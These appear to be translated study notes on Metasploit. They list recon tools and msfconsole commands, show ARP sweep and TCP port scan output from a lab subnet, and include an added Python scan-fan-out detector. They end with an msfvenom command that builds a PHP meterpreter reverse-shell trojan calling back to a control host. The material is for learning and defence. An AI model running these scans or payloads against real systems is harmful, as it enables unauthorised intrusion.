Network security: MSF study notes, part 1
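Tool: netcat
Purpose: port connections, submitting data
Tool: nmap
Purpose: port scanning, service identification, operating-system fingerprinting
Tool: httprint
Purpose: identify the type of HTTP server from its remote HTTP fingerprint
Tool: TamperIE
Purpose: modify and forward HTTP packets (Firefox plug-in)
2. MSF commands
msfconsole: enter the console
0. help / ?
1. search: search for modules (help search shows how to use it)
2. info: show a module's detailed usage
3. use: select a module
show options: show the module's parameters
4. set x y: set parameter x to value y
set rhost 192.168.0.1
5. run / exploit
6. back: return to the main prompt
7. quit / exit: leave msf
2. Information gathering
Used to discover hosts:
use auxiliary/scanner/discovery/arp_sweep
Example: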
msf6 > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > show options
Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    5                yes       The number of seconds to wait for new data
RHOSTS, THREADS and TIMEOUT are required. THREADS and TIMEOUT already have default values, so only RHOSTS has to be set.
msf6 auxiliary(scanner/discovery/arp_sweep) > set rhost 192.168.50.1/24
rhost => 192.168.50.1/24
msf6 auxiliary(scanner/discovery/arp_sweep) > run
[+] 192.168.50.1 appears to be up (LANNER ELECTRONICS, INC.).
[+] 192.168.50.1 appears to be up (LANNER ELECTRONICS, INC.).
[+] 192.168.50.2 appears to be up (HUAWEI TECHNOLOGIES CO.,LTD).
[+] 192.168.50.3 appears to be up (Cisco Systems).
[+] 192.168.50.21 appears to be up (UNKNOWN).
[+] 192.168.50.23 appears to be up (UNKNOWN).
[+] 192.168.50.25 appears to be up (UNKNOWN).
[+] 192.168.50.26 appears to be up (UNKNOWN).
[+] 192.168.50.29 appears to be up (UNKNOWN).
[+] 192.168.50.30 appears to be up (UNKNOWN).
[+] 192.168.50.35 appears to be up (UNKNOWN).
[+] 192.168.50.37 appears to be up (UNKNOWN).
[+] 192.168.50.68 appears to be up (UNKNOWN).
[+] 192.168.50.53 appears to be up (VMware, Inc.).
[+] 192.168.50.74 appears to be up (UNKNOWN).
[+] 192.168.50.96 appears to be up (AIO LCD PC BU / TPV).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 > search portscan
Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner
   3  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   4  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
   7  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator

Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.50.96
rhosts => 192.168.50.96
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.50.96: - 192.168.50.96:135 - TCP OPEN
[+] 192.168.50.96: - 192.168.50.96:139 - TCP OPEN
[+] 192.168.50.96: - 192.168.50.96:445 - TCP OPEN
[+] 192.168.50.96: - 192.168.50.96:1027 - TCP OPEN
[+] 192.168.50.96: - 192.168.50.96:5040 - TCP OPEN
[+] 192.168.50.96: - 192.168.50.96:8900 - TCP OPEN
[*] 192.168.50.96: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
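Seen from the defended network, both scans above have the same signature: one source touching a large number of distinct targets in a few seconds (256 ARP lookups across the /24, or thousands of ports on one host with the default PORTS 1-10000). The following detector is an added example, not part of the original notes; the event format, the thresholds and the scanner address 192.168.50.200 are assumptions made up for the illustration.

```python
from collections import defaultdict, deque

# Assumed thresholds (tune per network): distinct targets per source within WINDOW seconds.
WINDOW = 5.0
THRESHOLDS = {"arp": 50, "tcp": 100}

def detect_fanout(events, window=WINDOW, thresholds=THRESHOLDS):
    """events: (ts_seconds, kind, source, target). Returns {(kind, source): peak distinct targets}."""
    recent = defaultdict(deque)                    # (kind, src) -> (ts, target) inside the window
    live = defaultdict(lambda: defaultdict(int))   # (kind, src) -> target -> hits inside the window
    alerts = {}
    for ts, kind, src, target in sorted(events):
        key = (kind, src)
        recent[key].append((ts, target))
        live[key][target] += 1
        while ts - recent[key][0][0] > window:     # expire events older than the window
            _, old = recent[key].popleft()
            live[key][old] -= 1
            if live[key][old] == 0:
                del live[key][old]
        if len(live[key]) >= thresholds[kind]:
            alerts[key] = max(alerts.get(key, 0), len(live[key]))
    return alerts

def sample_events():
    """Constructed traffic: one scanner (192.168.50.200, made up) plus one ordinary host."""
    ev = []
    for i in range(256):                           # ARP who-has for every address in the /24
        ev.append((i * 0.01, "arp", "192.168.50.200", f"192.168.50.{i}"))
    for port in range(1, 2001):                    # SYNs to consecutive ports on one host
        ev.append((10 + port * 0.001, "tcp", "192.168.50.200", f"192.168.50.96:{port}"))
    for i, tgt in enumerate(["192.168.50.1", "192.168.50.3", "192.168.50.1"]):
        ev.append((i * 2.0, "arp", "192.168.50.21", tgt))       # normal ARP resolution
    for i, port in enumerate([445, 445, 135, 445]):
        ev.append((20 + i, "tcp", "192.168.50.21", f"192.168.50.96:{port}"))
    return ev

if __name__ == "__main__":
    for (kind, src), n in sorted(detect_fanout(sample_events()).items()):
        print(f"ALERT {kind} fan-out from {src}: {n} distinct targets within {WINDOW}s")
```

A scan slowed down with the module's DELAY and JITTER options spreads the same targets over a longer period, so a second, longer window with a proportionally higher threshold is the usual complement.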
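Forward attack: the control machine controls the target machine directly.
Reverse (connect-back) attack: the control machine opens a port, the target machine runs the trojan and connects back to the control machine.
Building a trojan and getting a shell over the reverse connection
The complete flow is:
1. msfvenom generates the trojan file
2. msf listens on the specified port
3. The trojan file is accessed, which yields a meterpreter connection
The trojan can be built without starting the interactive msf terminal, msfconsole.
Use msfvenom: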
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.11 lport=7777 -o shell.php
lhost and lport are the control machine's address and port number. The precondition is that the control machine has a listener running on port 7777.